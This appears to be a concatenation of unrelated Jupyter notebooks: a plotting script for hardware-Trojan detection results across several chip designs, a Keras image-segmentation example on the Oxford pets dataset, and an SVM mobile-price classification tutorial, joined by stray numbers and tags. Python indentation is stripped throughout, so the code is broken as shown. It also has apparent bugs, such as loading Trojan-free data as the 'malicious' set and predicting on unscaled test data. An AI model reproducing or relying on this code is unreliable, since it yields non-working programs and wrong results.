# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
# Format Main Plot
ax.set_ylim(-10, ylim)
ax.set_xlabel('Clock Cycles')
ax.set_ylabel('# SSCs')
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# Add background shading to indicate different testing phases
shade = True
cycle_epochs = map(lambda x: float(x) / float(clk_period), epochs)
for i in range(1, len(cycle_epochs[0:-1])):
x_coord = cycle_epochs[i]
next_x_coord = cycle_epochs[i+1]
# plt.axvline(x=(x_coord-50000), color='0.1', linestyle='--', alpha=.5)
if shade:
ax.fill_between([x_coord, next_x_coord], -10, ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
return ax
# Define Design Characteristics
aes_clk_period = 10
aes_epochs = [0, 9900, 19800]
aes_ylim = 500
# Load Data
aes_tjfree_df = load_data_df_wf(tjfree_aes_data_dir, aes_clk_period, 'aes')
aes_mal_df = load_data_df_wf(mal_aes_data_dir, aes_clk_period, 'aes')
# Create Main Plot
ax = plot_ttt_timeseries(aes_clk_period, \
aes_epochs, \
aes_ylim, \
aes_tjfree_df, \
aes_mal_df)
# Create 2.5x Zoom-in Inset
axins = zoomed_inset_axes(ax, 4, loc=1, bbox_to_anchor=(575, 170))
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Format Inset
x1, x2, y1, y2 = float(11000) / float(aes_clk_period), float(12500) / float(aes_clk_period), -10, 75
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if AES_SAVE_AS_PDF:
plt.savefig(AES_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
# Define Design Characteristics
uart_clk_period = 10
uart_epochs = [0, 786150, 1349660, 4482460, 5046260, 8179060]
uart_epochs = map(lambda x: x - 30000, uart_epochs)
uart_ylim = 150
# Load Data
uart_tjfree_df = load_data_df_wf(tjfree_uart_data_dir, uart_clk_period, 'uart')
uart_mal_df = load_data_df_wf(mal_uart_data_dir, uart_clk_period, 'uart')
# Create Main Plot
ax = plot_ttt_timeseries(uart_clk_period, \
uart_epochs, \
uart_ylim, \
uart_tjfree_df, \
uart_mal_df)
# Create 2x zoom-in inset
axins = zoomed_inset_axes(ax, 2, loc=1, bbox_to_anchor=(575, 175))
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Format Inset Plot
x1, x2, y1, y2 = float(6250000) / float(uart_clk_period) , float(7100000) / float(uart_clk_period), -5, 30
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=4, loc2=2, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# Save as PDF
if UART_SAVE_AS_PDF:
plt.savefig(UART_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
# Define Design Characteristics
or1200_clk_period = 20
or1200_epochs = or1200_epochs = [0,2620900,5241700,7035700,8829700,8898100,8966500,9051700,9136900,9882700,10628500,18361300, 26094100,27429100,28764100,28836100,28908100]
or1200_ylim = 175
or1200_cycle_epochs = map(lambda x: float(x) / float(or1200_clk_period), or1200_epochs)
# Load Data
or1200_tjfree_df = load_data_df_wf(tjfree_or1200_data_dir, or1200_clk_period, 'or1200')
or1200_mal_df = load_data_df_wf(mal_or1200_data_dir, or1200_clk_period, 'or1200')
# Create Main Plot
ax = plot_ttt_timeseries(or1200_clk_period, \
or1200_epochs, \
or1200_ylim, \
or1200_tjfree_df, \
or1200_mal_df)
# ============================================================================================================
# Create Zoom-in Inset 1
# axins = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(280, 230)) # zoom = 2
axins = inset_axes(ax, 3, 1.1, loc=2, bbox_to_anchor=(0.2, 1.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(or1200_cycle_epochs[0:-1])):
x_coord = or1200_cycle_epochs[i]
next_x_coord = or1200_cycle_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins.fill_between([x_coord, next_x_coord], -10, or1200_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = float(8600000) / float(or1200_clk_period), float(9300000) / float(or1200_clk_period), 50, 70
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Zoom-in Inset 2
# axins2 = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(460, 230)) # zoom = 5
axins2 = inset_axes(ax, 1.5, 1.1, loc=2, bbox_to_anchor=(0.73, 1.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(or1200_cycle_epochs[0:-1])):
x_coord = or1200_cycle_epochs[i]
next_x_coord = or1200_cycle_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins2.fill_between([x_coord, next_x_coord], -10, or1200_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = float(28750000) / float(or1200_clk_period), float(28930000) / float(or1200_clk_period), -5, 20
axins2.set_xlim(x1, x2)
axins2.set_ylim(y1, y2)
axins2.set_frame_on(True)
axins2.set_xlabel('')
axins2.set_ylabel('')
axins2.xaxis.set_ticklabels([])
axins2.yaxis.set_ticklabels([])
mark_inset(ax, axins2, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins2.spines.values(), color='0.5')
plt.setp([axins2.get_xticklines(), axins2.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if OR1200_SAVE_AS_PDF:
plt.savefig(OR1200_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
# Define Design Characteristics
picorv32_clk_period = 10000
# picorv32_epochs = [0, 9112, 9335, 9458, 9634, 10039, 10972, 11909, 12842, 13847, 16082, 18389, 19173, 19993, 20843, 21646, 22506, 24551, 27359, 29582, 30347, 31097, 31757, 32392, 34233, 35180, 36128, 37120, 39157, 41774, 44261, 46280, 48383, 51450, 53974, 56061, 58762, 64181, 70256, 76298, 80204, 80833, 81484, 83321, 83969, 84155, 84214, 84669, 110391]
# picorv32_epochs = [0, 103183, 128433, 132297]
picorv32_epochs = [0, 10308, 22324, 29980, 49939, 75850, 99600, 102410, 132162]
picorv32_epochs_scaled = map(lambda x: x * picorv32_clk_period, picorv32_epochs)
picorv32_ylim = 250
picorv32_cycle_epochs = map(lambda x: float(x) / float(picorv32_clk_period), picorv32_epochs)
# Load Data
picorv32_tjfree_df = load_data_df_wf(tjfree_picorv32_data_dir, picorv32_clk_period, 'picorv32')
picorv32_mal_df = load_data_df_wf(tjfree_picorv32_data_dir, picorv32_clk_period, 'picorv32')
# Create Main Plot
ax = plot_ttt_timeseries(picorv32_clk_period, \
picorv32_epochs_scaled, \
picorv32_ylim, \
picorv32_tjfree_df, \
picorv32_mal_df)
# ============================================================================================================
# Create Zoom-in Inset 1
# axins = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(280, 230)) # zoom = 2
axins = inset_axes(ax, 1, 1, loc=3, bbox_to_anchor=(0.76, 0.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(picorv32_epochs[0:-1])):
x_coord = picorv32_epochs[i]
next_x_coord = picorv32_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins.fill_between([x_coord, next_x_coord], -10, picorv32_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = 131500, 132500, 0, 20
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if PICORV32_SAVE_AS_PDF:
plt.savefig(PICORV32_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
| 0.480479 | 0.484868 |
This is a companion notebook for the book [Deep Learning with Python, Second Edition](https://www.manning.com/books/deep-learning-with-python-second-edition?a_aid=ml-ninja&a_cid=11111111&chan=c2). For readability, it only contains runnable code blocks and section titles, and omits everything else in the book: text paragraphs, figures, and pseudocode.
**If you want to be able to follow what's going on, I recommend reading the notebook side by side with your copy of the book.**
This notebook was generated for TensorFlow 2.6.
# Advanced deep learning for computer vision
## Three essential computer vision tasks
## An image segmentation example
```
!wget http://www.robots.ox.ac.uk/~vgg/data/pets/data/images.tar.gz
!wget http://www.robots.ox.ac.uk/~vgg/data/pets/data/annotations.tar.gz
!tar -xf images.tar.gz
!tar -xf annotations.tar.gz
import os
input_dir = "images/"
target_dir = "annotations/trimaps/"
input_img_paths = sorted(
[os.path.join(input_dir, fname)
for fname in os.listdir(input_dir)
if fname.endswith(".jpg")])
target_paths = sorted(
[os.path.join(target_dir, fname)
for fname in os.listdir(target_dir)
if fname.endswith(".png") and not fname.startswith(".")])
import matplotlib.pyplot as plt
from tensorflow.keras.utils import load_img, img_to_array
plt.axis("off")
plt.imshow(load_img(input_img_paths[9]))
def display_target(target_array):
normalized_array = (target_array.astype("uint8") - 1) * 127
plt.axis("off")
plt.imshow(normalized_array[:, :, 0])
img = img_to_array(load_img(target_paths[9], color_mode="grayscale"))
display_target(img)
import numpy as np
import random
img_size = (200, 200)
num_imgs = len(input_img_paths)
random.Random(1337).shuffle(input_img_paths)
random.Random(1337).shuffle(target_paths)
def path_to_input_image(path):
return img_to_array(load_img(path, target_size=img_size))
def path_to_target(path):
img = img_to_array(
load_img(path, target_size=img_size, color_mode="grayscale"))
img = img.astype("uint8") - 1
return img
input_imgs = np.zeros((num_imgs,) + img_size + (3,), dtype="float32")
targets = np.zeros((num_imgs,) + img_size + (1,), dtype="uint8")
for i in range(num_imgs):
input_imgs[i] = path_to_input_image(input_img_paths[i])
targets[i] = path_to_target(target_paths[i])
num_val_samples = 1000
train_input_imgs = input_imgs[:-num_val_samples]
train_targets = targets[:-num_val_samples]
val_input_imgs = input_imgs[-num_val_samples:]
val_targets = targets[-num_val_samples:]
from tensorflow import keras
from tensorflow.keras import layers
def get_model(img_size, num_classes):
inputs = keras.Input(shape=img_size + (3,))
x = layers.Rescaling(1./255)(inputs)
x = layers.Conv2D(64, 3, strides=2, activation="relu", padding="same")(x)
x = layers.Conv2D(64, 3, activation="relu", padding="same")(x)
x = layers.Conv2D(128, 3, strides=2, activation="relu", padding="same")(x)
x = layers.Conv2D(128, 3, activation="relu", padding="same")(x)
x = layers.Conv2D(256, 3, strides=2, padding="same", activation="relu")(x)
x = layers.Conv2D(256, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(256, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(256, 3, activation="relu", padding="same", strides=2)(x)
x = layers.Conv2DTranspose(128, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(128, 3, activation="relu", padding="same", strides=2)(x)
x = layers.Conv2DTranspose(64, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(64, 3, activation="relu", padding="same", strides=2)(x)
outputs = layers.Conv2D(num_classes, 3, activation="softmax", padding="same")(x)
model = keras.Model(inputs, outputs)
return model
model = get_model(img_size=img_size, num_classes=3)
model.summary()
model.compile(optimizer="rmsprop", loss="sparse_categorical_crossentropy")
callbacks = [
keras.callbacks.ModelCheckpoint("oxford_segmentation.keras",
save_best_only=True)
]
history = model.fit(train_input_imgs, train_targets,
epochs=50,
callbacks=callbacks,
batch_size=64,
validation_data=(val_input_imgs, val_targets))
epochs = range(1, len(history.history["loss"]) + 1)
loss = history.history["loss"]
val_loss = history.history["val_loss"]
plt.figure()
plt.plot(epochs, loss, "bo", label="Training loss")
plt.plot(epochs, val_loss, "b", label="Validation loss")
plt.title("Training and validation loss")
plt.legend()
from tensorflow.keras.utils import array_to_img
model = keras.models.load_model("oxford_segmentation.keras")
i = 4
test_image = val_input_imgs[i]
plt.axis("off")
plt.imshow(array_to_img(test_image))
mask = model.predict(np.expand_dims(test_image, 0))[0]
def display_mask(pred):
mask = np.argmax(pred, axis=-1)
mask *= 127
plt.axis("off")
plt.imshow(mask)
display_mask(mask)
```
|
github_jupyter
|
!wget http://www.robots.ox.ac.uk/~vgg/data/pets/data/images.tar.gz
!wget http://www.robots.ox.ac.uk/~vgg/data/pets/data/annotations.tar.gz
!tar -xf images.tar.gz
!tar -xf annotations.tar.gz
import os
input_dir = "images/"
target_dir = "annotations/trimaps/"
input_img_paths = sorted(
[os.path.join(input_dir, fname)
for fname in os.listdir(input_dir)
if fname.endswith(".jpg")])
target_paths = sorted(
[os.path.join(target_dir, fname)
for fname in os.listdir(target_dir)
if fname.endswith(".png") and not fname.startswith(".")])
import matplotlib.pyplot as plt
from tensorflow.keras.utils import load_img, img_to_array
plt.axis("off")
plt.imshow(load_img(input_img_paths[9]))
def display_target(target_array):
normalized_array = (target_array.astype("uint8") - 1) * 127
plt.axis("off")
plt.imshow(normalized_array[:, :, 0])
img = img_to_array(load_img(target_paths[9], color_mode="grayscale"))
display_target(img)
import numpy as np
import random
img_size = (200, 200)
num_imgs = len(input_img_paths)
random.Random(1337).shuffle(input_img_paths)
random.Random(1337).shuffle(target_paths)
def path_to_input_image(path):
return img_to_array(load_img(path, target_size=img_size))
def path_to_target(path):
img = img_to_array(
load_img(path, target_size=img_size, color_mode="grayscale"))
img = img.astype("uint8") - 1
return img
input_imgs = np.zeros((num_imgs,) + img_size + (3,), dtype="float32")
targets = np.zeros((num_imgs,) + img_size + (1,), dtype="uint8")
for i in range(num_imgs):
input_imgs[i] = path_to_input_image(input_img_paths[i])
targets[i] = path_to_target(target_paths[i])
num_val_samples = 1000
train_input_imgs = input_imgs[:-num_val_samples]
train_targets = targets[:-num_val_samples]
val_input_imgs = input_imgs[-num_val_samples:]
val_targets = targets[-num_val_samples:]
from tensorflow import keras
from tensorflow.keras import layers
def get_model(img_size, num_classes):
inputs = keras.Input(shape=img_size + (3,))
x = layers.Rescaling(1./255)(inputs)
x = layers.Conv2D(64, 3, strides=2, activation="relu", padding="same")(x)
x = layers.Conv2D(64, 3, activation="relu", padding="same")(x)
x = layers.Conv2D(128, 3, strides=2, activation="relu", padding="same")(x)
x = layers.Conv2D(128, 3, activation="relu", padding="same")(x)
x = layers.Conv2D(256, 3, strides=2, padding="same", activation="relu")(x)
x = layers.Conv2D(256, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(256, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(256, 3, activation="relu", padding="same", strides=2)(x)
x = layers.Conv2DTranspose(128, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(128, 3, activation="relu", padding="same", strides=2)(x)
x = layers.Conv2DTranspose(64, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(64, 3, activation="relu", padding="same", strides=2)(x)
outputs = layers.Conv2D(num_classes, 3, activation="softmax", padding="same")(x)
model = keras.Model(inputs, outputs)
return model
model = get_model(img_size=img_size, num_classes=3)
model.summary()
model.compile(optimizer="rmsprop", loss="sparse_categorical_crossentropy")
callbacks = [
keras.callbacks.ModelCheckpoint("oxford_segmentation.keras",
save_best_only=True)
]
history = model.fit(train_input_imgs, train_targets,
epochs=50,
callbacks=callbacks,
batch_size=64,
validation_data=(val_input_imgs, val_targets))
epochs = range(1, len(history.history["loss"]) + 1)
loss = history.history["loss"]
val_loss = history.history["val_loss"]
plt.figure()
plt.plot(epochs, loss, "bo", label="Training loss")
plt.plot(epochs, val_loss, "b", label="Validation loss")
plt.title("Training and validation loss")
plt.legend()
from tensorflow.keras.utils import array_to_img
model = keras.models.load_model("oxford_segmentation.keras")
i = 4
test_image = val_input_imgs[i]
plt.axis("off")
plt.imshow(array_to_img(test_image))
mask = model.predict(np.expand_dims(test_image, 0))[0]
def display_mask(pred):
mask = np.argmax(pred, axis=-1)
mask *= 127
plt.axis("off")
plt.imshow(mask)
display_mask(mask)
| 0.811078 | 0.893356 |
```
#https://www.kaggle.com/azzion/svm-for-beginners-tutorial/notebook
#https://www.kaggle.com/gulsahdemiryurek/mobile-price-classification-with-svm
#Mobile Price Classification
#The below topics are covered in this Kernal.
#1. Data prepocessing
#2. Target value Analysis
#3. SVM
#4. Linear SVM
#5. SV Regressor
#6. Non Linear SVM with kernal - RBF ( note: you can also try poly )
#7. Non Linear SVR
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
#connect to google drive
from google.colab import drive
drive.mount('/content/drive')
# A.DATA PREPROCESSING
# save filepath to variable for easier access
train_file_path = '../content/drive/MyDrive/pemb mesin/mgg 8/train1.csv'
test_file_path = '../content/drive/MyDrive/pemb mesin/mgg 8/test1.csv'
df = pd.read_csv(train_file_path)
test = pd.read_csv(test_file_path)
df.head()
df.info()
#battery_power: Total energy a battery can store in one time measured in mAh
#blue: Has bluetooth or not
#clock_speed: speed at which microprocessor executes instructions
#dual_sim: Has dual sim support or not
#fc: Front Camera mega pixels
#four_g: Has 4G or not
#int_memory: Internal Memory in Gigabytes
#m_dep: Mobile Depth in cm
#mobile_wt: Weight of mobile phone
#n_cores: Number of cores of processor
#pc: Primary Camera mega pixels
#px_height: Pixel Resolution Height
#px_width: Pixel Resolution Width
#ram: Random Access Memory in Mega Bytes
#sc_h: Screen Height of mobile in cm
#sc_w: Screen Width of mobile in cm
#talk_time: longest time that a single battery charge will last when you are
#three_g: Has 3G or not
#touch_screen: Has touch screen or not
#wifi: Has wifi or not
#price_range: This is the target variable with value of 0(low cost), 1(medium cost), 2(high cost) and 3(very high cost).
#cek missing values
import missingno as msno
import matplotlib.pyplot as plt
msno.bar(df)
plt.show()
#B. TARGET VALUE ANALYSIS
#understanding the predicted value - which is hot encoded, in real life price won't be hot encoded.
df['price_range'].describe(), df['price_range'].unique()
# there are 4 classes in the predicted value
#correlation matrix with heatmap (mencari korelasi antar features, salah satu teknik features selection)
corrmat = df.corr()
f,ax = plt.subplots(figsize=(12,10))
sns.heatmap(corrmat,vmax=0.8,square=True,annot=True,annot_kws={'size':8})
#price range correlation
corrmat.sort_values(by=["price_range"],ascending=False).iloc[0].sort_values(ascending=False)
f, ax = plt.subplots(figsize=(10,4))
plt.scatter(y=df['price_range'],x=df['battery_power'],color='red')
plt.scatter(y=df['price_range'],x=df['ram'],color='Green')
plt.scatter(y=df['price_range'],x=df['n_cores'],color='blue')
plt.scatter(y=df['price_range'],x=df['mobile_wt'],color='orange')
# clearly we can see that each of the category has different set of value ranges
# SUPPORT VECTOR MACHINES AND METHODS :
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
y_t = np.array(df['price_range'])
X_t = df
X_t = df.drop(['price_range'],axis=1)
X_t = np.array(X_t)
print("shape of Y :"+str(y_t.shape))
print("shape of X :"+str(X_t.shape))
from sklearn.preprocessing import MinMaxScaler #(scaling rentang 0-1)
scaler = MinMaxScaler()
X_t = scaler.fit_transform(X_t)
X_train,X_test,Y_train,Y_test = train_test_split(X_t,y_t,test_size=.20,random_state=42)
print("shape of X Train :"+str(X_train.shape))
print("shape of X Test :"+str(X_test.shape))
print("shape of Y Train :"+str(Y_train.shape))
print("shape of Y Test :"+str(Y_test.shape))
for this_C in [1,3,5,10,40,60,80,100]: #parameter C di SVM Linier
clf = SVC(kernel='linear',C=this_C).fit(X_train,Y_train) #clf = cross validate metrics for evaluating classification
scoretrain = clf.score(X_train,Y_train)
scoretest = clf.score(X_test,Y_test)
print("Linear SVM value of C:{}, training score :{:2f} , Test Score: {:2f} \n".format(this_C,scoretrain,scoretest))
from sklearn.model_selection import cross_val_score,StratifiedKFold,LeaveOneOut
clf1 = SVC(kernel='linear',C=20).fit(X_train,Y_train)
scores = cross_val_score(clf1,X_train,Y_train,cv=5)
strat_scores = cross_val_score(clf1,X_train,Y_train,cv=StratifiedKFold(5,random_state=10,shuffle=True))
#Loo = LeaveOneOut()
#Loo_scores = cross_val_score(clf1,X_train,Y_train,cv=Loo)
print("The Cross Validation Score :"+str(scores))
print("The Average Cross Validation Score :"+str(scores.mean()))
print("The Stratified Cross Validation Score :"+str(strat_scores))
print("The Average Stratified Cross Validation Score :"+str(strat_scores.mean()))
#print("The LeaveOneOut Cross Validation Score :"+str(Loo_scores))
#print("The Average LeaveOneOut Cross Validation Score :"+str(Loo_scores.mean()))
from sklearn.dummy import DummyClassifier
for strat in ['stratified', 'most_frequent', 'prior', 'uniform']:
dummy_maj = DummyClassifier(strategy=strat).fit(X_train,Y_train)
print("Train Stratergy :{} \n Score :{:.2f}".format(strat,dummy_maj.score(X_train,Y_train)))
print("Test Stratergy :{} \n Score :{:.2f}".format(strat,dummy_maj.score(X_test,Y_test)))
# plotting the decision boundries for the data
#converting the data to array for plotting.
X = np.array(df.iloc[:,[0,13]])
y = np.array(df['price_range'])
print("Shape of X:"+str(X.shape))
print("Shape of y:"+str(y.shape))
X = scaler.fit_transform(X)
# custome color maps
cm_dark = ListedColormap(['#ff6060', '#8282ff','#ffaa00','#fff244','#4df9b9','#76e8fc','#3ad628'])
cm_bright = ListedColormap(['#ffafaf', '#c6c6ff','#ffaa00','#ffe2a8','#bfffe7','#c9f7ff','#9eff93'])
plt.scatter(X[:,0],X[:,1],c=y,cmap=cm_dark,s=10,label=y)
plt.show()
h = .02 # step size in the mesh
C_param = 1 # No of neighbours
for weights in ['uniform', 'distance']:
# we create an instance of Neighbours Classifier and fit the data.
clf1 = SVC(kernel='linear',C=C_param)
clf1.fit(X, y)
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, x_max]x[y_min, y_max].
x_min, x_max = X[:, 0].min()-.20, X[:, 0].max()+.20
y_min, y_max = X[:, 1].min()-.20, X[:, 1].max()+.20
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = clf1.predict(np.c_[xx.ravel(), yy.ravel()]) # ravel to flatten the into 1D and c_ to concatenate
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure()
plt.pcolormesh(xx, yy, Z, cmap=cm_bright)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cm_dark,
edgecolor='k', s=20)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.title("SVM Linear Classification (kernal = linear, Gamma = '%s')"% (C_param))
plt.show()
print("The score of the above :"+str(clf1.score(X,y)))
# Linear Support vector machine with only C Parameter
from sklearn.svm import LinearSVC
for this_C in [1,3,5,10,40,60,80,100]:
clf2 = LinearSVC(C=this_C).fit(X_train,Y_train)
scoretrain = clf2.score(X_train,Y_train)
scoretest = clf2.score(X_test,Y_test)
print("Linear SVM value of C:{}, training score :{:2f} , Test Score: {:2f} \n".format(this_C,scoretrain,scoretest))
from sklearn.svm import SVR
svr = SVR(kernel='linear',C=1,epsilon=.01).fit(X_train,Y_train)
print("{:.2f} is the accuracy of the SV Regressor".format(svr.score(X_train,Y_train)))
#NON LINIER SVM
# SMV with RBF KERNAL AND ONLY C PARAMETER
for this_C in [1,5,10,25,50,100]:
clf3 = SVC(kernel='rbf',C=this_C).fit(X_train,Y_train)
clf3train = clf3.score(X_train,Y_train)
clf3test = clf3.score(X_test,Y_test)
print("SVM for Non Linear \n C:{} Training Score : {:2f} Test Score : {:2f}\n".format(this_C,clf3train,clf3test))
# SVM WITH RBF KERNAL, C AND GAMMA HYPERPARAMTER
for this_gamma in [.1,.5,.10,.25,.50,1]:
for this_C in [1,5,7,10,15,25,50]:
clf3 = SVC(kernel='rbf',C=this_C,gamma=this_gamma).fit(X_train,Y_train)
clf3train = clf3.score(X_train,Y_train)
clf3test = clf3.score(X_test,Y_test)
print("SVM for Non Linear \n Gamma: {} C:{} Training Score : {:2f} Test Score : {:2f}\n".format(this_gamma,this_C,clf3train,clf3test))
# grid search method
from sklearn.model_selection import GridSearchCV
param_grid = {'C': [1,5,7,10,15,25,50],
'gamma': [.1,.5,.10,.25,.50,1]}
GS = GridSearchCV(SVC(kernel='rbf'),param_grid,cv=5)
GS.fit(X_train,Y_train)
print("the parameters {} are the best.".format(GS.best_params_))
print("the best score is {:.2f}.".format(GS.best_score_))
# Kernalized SVM machine
svr2 = SVR(degree=2,C=100,epsilon=.01).fit(X_train,Y_train)
print("{:.2f} is the accuracy of the SV Regressor".format(svr2.score(X_train,Y_train)))
test = test.drop(['id'],axis=1)
test.head()
test_mat = np.array(test)
test = scaler.fit_transform(test_mat)
clf4 = SVC(kernel='rbf',C=25,gamma=.1).fit(X_train,Y_train)
prediction = clf4.predict(test_mat)
pred = pd.DataFrame(prediction)
pred.head()
pred.info()
prediction = svr2.predict(test_mat)
pred = pd.DataFrame(prediction)
pred.head()
```
|
github_jupyter
|
#https://www.kaggle.com/azzion/svm-for-beginners-tutorial/notebook
#https://www.kaggle.com/gulsahdemiryurek/mobile-price-classification-with-svm
#Mobile Price Classification
#The below topics are covered in this Kernal.
#1. Data prepocessing
#2. Target value Analysis
#3. SVM
#4. Linear SVM
